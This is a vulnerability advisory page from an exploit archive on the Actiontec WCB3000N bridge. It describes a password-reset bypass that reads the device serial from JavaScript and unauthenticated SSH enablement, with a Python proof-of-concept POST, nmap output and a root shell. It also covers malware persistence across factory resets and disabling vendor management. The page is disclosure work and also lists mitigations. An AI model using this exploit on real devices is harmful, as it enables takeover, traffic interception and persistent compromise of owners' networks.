exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Actiontec WCB3000N 0.16.2.5 Privilege Escalation

Actiontec WCB3000N 0.16.2.5 Privilege Escalation
Posted Nov 7, 2016
Authored by Andrew Klaus

Actiontec WCB3000N with firmware version 0.16.2.5 suffers from a privilege escalation vulnerability.

tags | exploit
SHA-256 | d334325a801f0f16ab6691fb7928af2b8fe205c07c1792c6af3ddad17a84e3eb

Actiontec WCB3000N 0.16.2.5 Privilege Escalation

Change Mirror Download
###  Device Details
Vendor: Actiontec (Telus Branded)
Model: WCB3000N
Affected Firmware: v0.16.2.5
Device Manual: *http://static.telus.com/common/cms/files/internet/wifi_plus_extender.pdf
<http://static.telus.com/common/cms/files/internet/wifi_plus_extender.pdf>*
Reported: November 2015
Status: Fixed on newest pushed firmware version
CVE: Update is handled by the vendor, therefore no CVE needed.

The Telus Actiontec WCB3000N is a access-point/bridge for MoCA, Gigabit
Ethernet, and both 802.11AGN 2.4GHz and 5GHz wireless spectrums. It
provides a web interface that allows control and configuration of each of
these technologies.

### Summary of Findings
The Forgot Password webpage (http://<device_ip>/forgot_password.html) asks
for the deviceas physical serial number before the admin password can be
reset. Any attacker on the same network as the device can pull the deviceas
serial number from javascript without requiring physical access to the
device and can then reset the user password.
SSH can be enabled and used by an attacker without any authentication.
Files are stored, whether malicious or not, on the read-write partition and
remain untouched after factory resets.
Both of these attacks requires the attacker to be on the same local network
as the access-point.


### Forgot Password Bypass
There is a javascript function on the "forgot password page" called
getDeviceSerialNum(). It calls the agotserialnum.cgia executable and places
the deviceas serial number in the device_serial_num variable on each page
load. This serial number variable can be viewed through the browser's
developer console by reading the device_serial_num variable. Once the
serial number is known, the password can be reset. The attacker needs to be
on the same network as the WCB3000N device.



### Enabling SSH and accessing root console
In the html on the Advanced Setup page, there are some references to a few
pages that arenat displayed by the browser by default. By design, when
accessing the /adv_localssh.html page we get automatically redirected the
the /adv_manage.html page as seen in the javascript code. However, if we
block the javascript from carrying through the redirect, we can see this
page. Following the javascript and html form, a /advlocalssh.cgi executable
is POSTed with form data without any authentication.

The proof of concept code in python is here:

import requests
ssh_data = {"command": "apply",
"mypage": "adv_localssh.html",
"advanced_ssh_enable":"1",
"advanced_ssh_username":"admin",
"advanced_ssh_password":"admin",
"advanced_ssh_port":"22",
"advanced_ssh_timeout":"",
"sel_ssh_timeout":"1800",
"custom_ssh_timeout": ""}
s = requests.session()
s.post("http://<device_ip>/advlocalssh.cgi", ssh_data)

## Before
[~]$ nmap -p ssh 192.168.1.10
PORT STATE SERVICE
22/tcp filtered ssh

[~]$ python2 wcb.py

## After
[~]$ nmap -p ssh 192.168.1.10
PORT STATE SERVICE
22/tcp open ssh

[~]$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@192.168.1.10
admin@192.168.1.10's password:
RLX Linux version 2.0
_ _ _
| | | ||_|
_ _ | | _ _ | | _ ____ _ _ _ _
| |/ || |\ \/ / | || | _ \| | | |\ \/ /
| |_/ | |/ \ | || | | | | |_| |/ \
|_| |_|\_/\_/ |_||_|_| |_|\____|\_/\_/

For further information check:
http://processor.realtek.com/
#


----------

### Other Discoveries
After gaining root access, other discoveries were made. Noticing the
/mnt/rt_conf directory being mounted read-write (which I assume is for
saving the config file state), I placed a dummy file in the directory and
then factory reset the device. The SSH access reverted back to being
disabled, but logging back into the device showed that the dummy file still
existed in /mnt/rt_conf.

OpenSSL is a very dated version (2006), and has 51 CVE vulnerabilities
listed
https://www.cvedetails.com/vulnerability-list/vendor_id-217/product_id-383/version_id-26306/Openssl-Openssl-0.9.8.html.
This could pose as a vulnerability when the device speaks over TR-069 and
pulls firmware updates.

# openssl version -a
OpenSSL 0.9.8b 04 May 2006
built on: Fri May 31 13:10:19 CST 2013
platform: rsdk-linux
options: bn(32,32) md2(int) rc4(ptr,int) des(idx,cisc,4,long) idea(int)
blowfish(idx)
compiler: rsdk-linux-gcc -fPIC -DOPENSSL_PIC -DOPENSSL_THREADS -D_REENTRANT
-DDSO_DLFCN -DHAVE_DLFCN_H -DTERMIO -Os -fomit-frame-pointer -Wall
OPENSSLDIR: "/usr/local/ssl"

Itas possible to both kill the TR-069 remote device management service and
rewrite the config to disable. Once disabled, thereas no way that the
vendor would be able to communicate with the device to patch.


### Plausible Uses
An attacker could keep malware stored and have it survive both reboots and
factory resets.

Since thereas a full terminal present on the device along including
utilities such as tcpdump and scp, it would be trivial to to sniff traffic
and Man-in-the-Middle connections passing through the bridge.

DoSsing or bricking the device would likely be as simple as clearing the
failsafe configs, or writing over the boot and/or firmware partitions. I
canat confirm this hypothesis since it would mean killing a device I use.


### Mitigations
Remove the SSH CGI scripts from the firmware or at the very least do
server-side authentication of the user.
Remove agotserialnum.cgia and process all validation server side, not with
javascript.


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close